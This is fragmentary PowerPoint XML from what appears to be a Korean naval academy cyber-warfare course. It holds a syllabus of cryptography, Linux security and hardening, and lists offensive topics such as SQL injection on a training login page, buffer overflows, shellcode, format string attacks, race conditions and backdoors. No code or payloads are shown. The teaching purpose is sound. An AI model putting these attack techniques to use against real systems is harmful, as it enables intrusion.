              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="1797549"/>
            <a:ext cx="5400040" cy="4594098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316125400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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>SQL Injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>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현재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공격이 통하는 취약한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로그인 페이지를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로그인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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>://web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.navy.mil.kr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>/webhack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SQL Injection</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SQL Injection</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2751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9" name="표 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AD44F7C-4518-4A11-9E00-574F251C6A55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1963954653"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="492578" y="262075"/>
          <a:ext cx="5728608" cy="6453010"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="875600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4082926486"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1081096">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2834295377"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2827815">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="316545484"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="944097">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1453330335"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="194361">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345408255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1</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40000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>정보보호 개요</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OT(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>교관 및 강의계획 소개</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</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사이버전 실습체계 개요</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5312411"/>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2</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암호 기술 실습</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고전암호 크래킹</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카이사르 암호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치환암호</a:t>
                      </a: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비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> 암호</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75</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>기 졸업</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[3.12.(</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920528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3</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암호 기술 실습</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RSA </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>제작 및 최적화</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>- RSA </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>제작 실습 및 최적화 방법 소개</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4815727"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="994322">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4</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 개념 및 운영체제 종류</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윈도우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맥</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유닉스</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시스템 명령어</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alias, keyword, function, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>내부 명령어</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명령어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0388763"/>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5</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리눅스 실습 도구</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>- vi </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>편집기</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, wireshark, objdump, gdb, python</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3326298"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="994322">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="110000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="0" spc="-80">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>6</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 </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파일 시스템 및 시스템 보안로그</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ext</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시스템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변조 및 감지</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사용자 계정 관리</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사용자 계정 확인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등록</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삭제</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패스워드 인증</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032605"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1173731">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7</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보안관리 및 침해상황 대비</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권한 변조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서비스 보안 강화 설정</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점검</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, R-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>명령어 제한</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접속 탐지 및 보안</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계정 원격 접속 및 우회 접속 탐지</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방화벽 설정</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6977292"/>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8</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[4. 19.(</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23.(</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a:solidFill>
                          <a:srgbClr val="0000FF"/>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4235184"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="516484">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9</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버퍼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메모리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복귀 주소 조작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홍보출장</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>차</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4.28.(</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수업후</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4.30.(</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7601621"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="표 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A4BF7D-D114-439F-A8AE-DE6E89910F14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4101388723"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6302284" y="262074"/>
          <a:ext cx="5397137" cy="5653856"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="824905">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1299382196"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1018495">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1978101040"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2664226">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3551419966"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="889511">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1336580900"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="253320">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1501439883"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="964316">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" fontAlgn="base" latinLnBrk="0">
                        <a:lnSpc>
                          <a:spcPct val="10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쉘코드</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어린이날</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 5.(</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>옥포제</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[5.6.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>목</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7723318"/>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힙</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US"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b="1" kern="0" spc="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="0000FF"/>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석가탄신일</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[5.19.(</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18132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포맷스트링 공격 및 대응</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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2153514"/>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레이스 컨디션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130</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>기</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OCS</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[5.28.(</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9320557"/>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백도어</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2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34851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[6.7(</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11.(</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118811" marR="118811" marT="59406" marB="594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4262386"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2067914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336044989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br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>암호실습</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1749232647"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3089260" y="2678454"/>
          <a:ext cx="6013480" cy="2216214"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="446310">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="860354">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2643554">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="266476251"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1031631">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1964046374"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1031631">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="36677930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사용도구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615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4">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고전암호 크래킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>카이사르 암호 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a: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8478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고전암호 크래킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>카이사르 암호 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>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9475649"/>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고전암호 크래킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>치환 암호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6985399"/>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현대암호 구현 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
                        <a:t>– RSA</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630849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4">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사이버개론</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실습</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 실습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카이사르 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hlinkClick r:id="rId6" action="ppaction://hlinkfile"/>
                        </a:rPr>
                        <a:t>웹페이지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고전암호 실습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비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> 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영화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웹페이지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현대암호 실습 </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웹페이지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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414995374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/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>고전암호 크래킹 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>카이사르 암호 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1</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key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>=3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55547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/1</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9436917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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F95EDA-569B-4FB2-B8C1-A4F23D8189D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="496940" y="1666873"/>
            <a:ext cx="5407156" cy="1250405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="그림 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6C104C3-F5A9-437A-8789-2CF8A77C87A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="496940" y="3508851"/>
            <a:ext cx="5411777" cy="1009362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="그림 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A59A2EAD-2631-493C-88F2-63F874436A0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282538" y="672914"/>
            <a:ext cx="5412521" cy="2904004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="그림 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{297938BA-6BF2-42E4-B078-369F391F8FB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282538" y="4119399"/>
            <a:ext cx="5412521" cy="736990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66877878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Along </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>with liberation, the Naval Academy was opened to foster elite naval officers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>who </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>will protect the seas of the motherland </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>by Admiral Son Won-il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>and other marine pioneers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
